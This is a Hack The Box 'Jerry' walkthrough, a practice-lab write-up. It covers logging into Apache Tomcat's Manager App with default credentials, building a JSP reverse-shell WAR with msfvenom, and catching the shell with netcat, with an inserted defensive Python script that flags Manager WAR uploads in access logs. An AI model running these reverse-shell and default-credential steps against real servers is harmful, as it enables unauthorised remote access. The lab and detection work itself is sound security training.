Hack The Box - Jerry Walkthrough




Let’s do a port scan to find out which services are running.

nmap -sC -sV -oA nmap/initial -vvv 

We found Apache Tomcat serving HTTP on port 8080, so let’s check what is being served at

Manager App looks interesting. Upon clicking on it, we are greeted with a login prompt.

Upon clicking cancel, we are greeted with an example of default credentials for Tomcat.

If we put those credentials into the login prompt from earlier, we reach the console page.

We see a place to upload a file, so let’s use msfvenom to generate a payload to get a reverse shell.

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=44 -f war > shelle0.war

Next we upload the payload and go to

Then we use netcat to listen on port 44 and get a shell.

nc -l -v -p 44
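Seen from the defender's side, the WAR upload through the Manager App described above leaves a recognisable trail in Tomcat's access log. The following is an added example, not part of the original walkthrough: it assumes the access log pattern from the stock server.xml (%h %l %u %t "%r" %s %b), and the log lines, addresses, user name and the function name find_manager_deployments are constructed for illustration.

```python
import re
from collections import defaultdict

# Stock Tomcat AccessLogValve pattern: %h %l %u %t "%r" %s %b
LINE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Contexts shipped with a default install; extend with your own applications.
KNOWN_CONTEXTS = {"/", "/docs", "/examples", "/manager", "/host-manager"}

# Constructed sample lines (addresses, user, nonce and timestamps are made up).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.0.2.10 - svc-deploy [01/Jan/2024:10:00:09 +0000] "GET /manager/html HTTP/1.1" 200 19689
192.0.2.10 - svc-deploy [01/Jan/2024:10:01:30 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=EXAMPLE HTTP/1.1" 200 21004
192.0.2.10 - - [01/Jan/2024:10:01:42 +0000] "GET /shelle0/ HTTP/1.1" 200 0
198.51.100.7 - - [01/Jan/2024:10:02:00 +0000] "GET /docs/ HTTP/1.1" 200 15000
"""

def find_manager_deployments(log_text, known_contexts=KNOWN_CONTEXTS, admin_hosts=()):
    """Flag WAR uploads via the Manager App and first hits on unknown contexts."""
    alerts, seen = [], set(known_contexts)
    prior_401 = defaultdict(int)  # failed manager logins per source host
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # not in the assumed pattern; skip rather than guess
        host, status = m["host"], int(m["status"])
        path = m["path"].split("?", 1)[0]  # drop the CSRF nonce query string
        if path.startswith("/manager/") and status == 401:
            prior_401[host] += 1
        elif m["method"] == "POST" and path == "/manager/html/upload" and status == 200:
            if host not in admin_hosts:  # deployment from outside the admin allowlist
                alerts.append({"rule": "war-upload", "host": host, "user": m["user"],
                               "time": m["ts"], "prior_401": prior_401[host]})
        elif status == 200:
            # First path segment approximates the context; files served by the
            # ROOT webapp (e.g. /favicon.ico) need adding to known_contexts.
            context = "/" + path.lstrip("/").split("/", 1)[0]
            if context not in seen:
                seen.add(context)
                alerts.append({"rule": "unknown-context", "host": host,
                               "context": context, "time": m["ts"]})
    return alerts

if __name__ == "__main__":
    for alert in find_manager_deployments(SAMPLE_LOG):
        print(alert)
```

On the sample this reports the upload and the first request to the newly deployed context; restricting the Manager App to an admin network and removing sample credentials from tomcat-users.xml closes the path itself.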

With some poking around, we find some logins for Tomcat.

Now if we navigate to the desktop of the Administrator account, we find the flags.



Here is a list of resources I used at some point while working on Jerry: